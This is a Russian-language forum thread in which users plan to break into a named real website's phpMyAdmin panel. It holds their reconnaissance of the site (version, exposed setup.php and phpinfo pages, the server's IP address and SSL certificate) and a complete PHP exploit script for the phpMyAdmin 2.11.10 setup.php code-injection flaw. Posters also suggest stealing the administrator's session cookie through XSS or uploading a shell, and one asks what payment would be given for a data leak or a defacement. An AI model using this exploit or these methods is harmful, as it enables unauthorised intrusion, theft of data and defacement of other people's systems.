Помогите найти уязвимость

Bag3ban1

Школьник
Репутация
19 / 1 025
Блин очень нужна админка етого сайта. Тему попрошу админов и модеров не выносить с етого топика!

http://vipalpha.com/

з.ы Исходник тоже б не против получить.


http://vipalpha.com/myadmin/

Apache/2.2.3 (CentOS) Server at vipalpha.com Port 80

Вот что ище нашел.
http://vipalpha.com/myadmin/scripts/setup.php

Версия phpMyAdmin 2.11.10

config.inc.php
Код:
<?php
/*
 * Generated configuration file
 * Generated by: phpMyAdmin 2.11.10 setup script by Michal Čihař <[email protected]>
 * Version: $Id: setup.php 13149 2009-12-07 13:09:09Z nijel $
 * Date: Sun, 17 Apr 2011 22:16:51 GMT
 */

$cfg['DefaultTabServer'] = 'server_status.php';
$cfg['DefaultTabDatabase'] = 'db_sql.php';
$cfg['DefaultTabTable'] = 'sql.php';
$cfg['LightTabs'] = false;
?>


Нашел ище такое
http://vipalpha.com/myadmin/phpinfo.php

Точная версия
http://vipalpha.com/myadmin/changelog.php




1. Уязвимость существует из-за того, что приложение создает временную директорию с привилегиями на запись для всех пользователей. Злоумышленник может изменить файлы.

2. Уязвимость существует из-за того, что приложение создает временные файлы с предсказуемым именем. Злоумышленник может с помощью специально сформированной символической ссылки произвести некоторые действия с повышенными привилегиями.

3. Уязвимость существует из-за того, что некоторые данные, передаваемые сценарию scripts/setup.php, используются для вызова функции unserialize().

Кто заюзать сможет сплоинт ?

p.s Или подскажите где мне еще копать ?
 
Понадобился сплоинт под 2.11.10
Код:
The configuration setup script (aka scripts/setup.php) in phpMyAdmin 2.11.x before 2.11.10.1 does not properly restrict key names in its output file, which allows remote attackers to execute arbitrary PHP code via a crafted POST request.

Код:
<?php 
set_time_limit(0);  

 // this is an exploit code for phpMyAdmin 2.11.10 

$target_url = "http://site.com/phpmyadmin/scripts/setup.php"; 
$token = null; 

// request 1 
$res = get_response(); 

// request 2 (add server) 
$res = get_response('POST', "token=$token&action=addserver"); 

// request 3 (save to session) 
$res = get_response('POST', "token=$token&action=addserver_real&host=localhost&connect_type=tcp&extension=mysql&auth_type=config&user=root&password=1&submit_save=Add&AllowDeny_order=1&AllowDeny[a][b]['.phpinfo().']=1"); 

// request 4 (save to file) 
$res = get_response('POST', "token=$token&action=save"); 

// request 5 (load file) 
$res = get_response('POST', "token=$token&action=load"); 
var_dump($res); 


function get_response($method='GET', $body=null) { 
    global $target_url, $token; 
    static $ch = null; 

    if ($ch === null) $ch = curl_init(); 

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 
    curl_setopt($ch, CURLOPT_URL, $target_url); 

    if ($method == 'POST') { 
        curl_setopt($ch, CURLOPT_POST, true); 
        curl_setopt($ch, CURLOPT_POSTFIELDS, $body); 
    } 

    curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookie.txt'); 
    curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookie.txt'); 

    $res = curl_exec($ch); 
    $token = get_token($res); 

    return $res; 
} 

function get_token($s) { 
    if (preg_match('#name="token" value="(.*?)"#', $s, $m)) { 
        return $m[1]; 
    } 
} 


?>
 
SSL Версия : TLSv1
Cipher : DHE-RSA-AES256-SHA
Имя : vds.evrohost.com
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px">Скрытая информация: "SSL сертификат" <input type="button" value="Показать" style="width:60px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = ''; this.innerText = ''; this.value = 'Скрыть'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Показать'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">

Certificate:
Data:
Version: 3 (0x2)
Serial Number:
c9:2f:db:1b:94:bc:97:ff
Signature Algorithm: sha1WithRSAEncryption
Issuer: C=XX, ST=XX, L=XX, O=XX, OU=XX/[email protected], CN=vds.evrohost.com
Validity
Not Before: Apr 12 15:58:51 2010 GMT
Not After : Apr 9 15:58:51 2020 GMT
Subject: C=XX, ST=XX, L=XX, O=XX, OU=XX/[email protected], CN=vds.evrohost.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:da:ac:fb:b9:67:6c:2b:e3:b5:39:aa:17:53:db:
f1:4c:a0:90:27:6b:d3:8b:fa:f1:65:73:29:a1:75:
d6:12:3b:a0:a2:a1:09:c5:13:d6:5c:a6:49:50:91:
97:62:eb:ca:cc:87:53:a7:68:84:3f:95:e5:f9:cb:
fa:bd:28:81:8e:c1:bb:ac:d8:58:d2:13:79:d0:c7:
fb:d9:58:fa:f1:2a:98:59:b5:96:79:4f:75:c8:f2:
1e:87:47:90:0f:12:2d:eb:25:ff:46:15:d6:a9:eb:
4a:74:7c:c2:dd:90:11:f6:fd:ea:ae:a3:f4:ee:de:
06:c8:e1:ee:e4:a6:2c:18:51
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Subject Alternative Name:
DNS:vds.evrohost.com, DNS:
Signature Algorithm: sha1WithRSAEncryption
ba:fc:68:74:3d:aa:81:ef:d0:41:a9:d5:63:bd:7c:db:c9:55:
e8:c0:a8:f9:95:d9:0c:3d:64:a4:cc:fe:5f:0c:e6:ad:ce:c3:
9a:4c:69:f1:f4:0a:f7:9e:f8:39:b8:aa:34:fc:33:90:6d:d1:
ff:d1:9c:31:b4:e5:96:dd:92:81:2d:82:ab:98:91:3d:a7:0c:
ad:82:1f:d6:ae:48:60:e8:a1:92:67:14:c7:2a:40:12:e5:9d:
18:1b:a1:fc:16:36:84:a6:92:5c:82:d1:ce:09:3f:70:d5:0d:
d4:a1:ff:33:40:60:bd:0a:16:a4:c5:c5:9b:6a:d0:f6:84:ab:
f3:af
</div>
</div>
</div>

возможно выполнение атаки межсайтовый скриптинг точнее XSS Сross Site Sсriрting + можно снифить HTTP-Cookie (например, идентификатор сессии администратора) или закатать шелл как то так =)

PS:А кока за слив или дефейс даш ? )


да чуть не забыл ипи хоста 193.107.208.64 и и мя хоста
(полученное при обратном DNS запросе): vds.evrohost.com
 
Прошу помочь бесплатно или хотя бы подсказать
сплоит можна заюзать после регистрации
XSS тож присутствует можн залить скрипт конвертнув в мувик и снифануть как то так
 
Сверху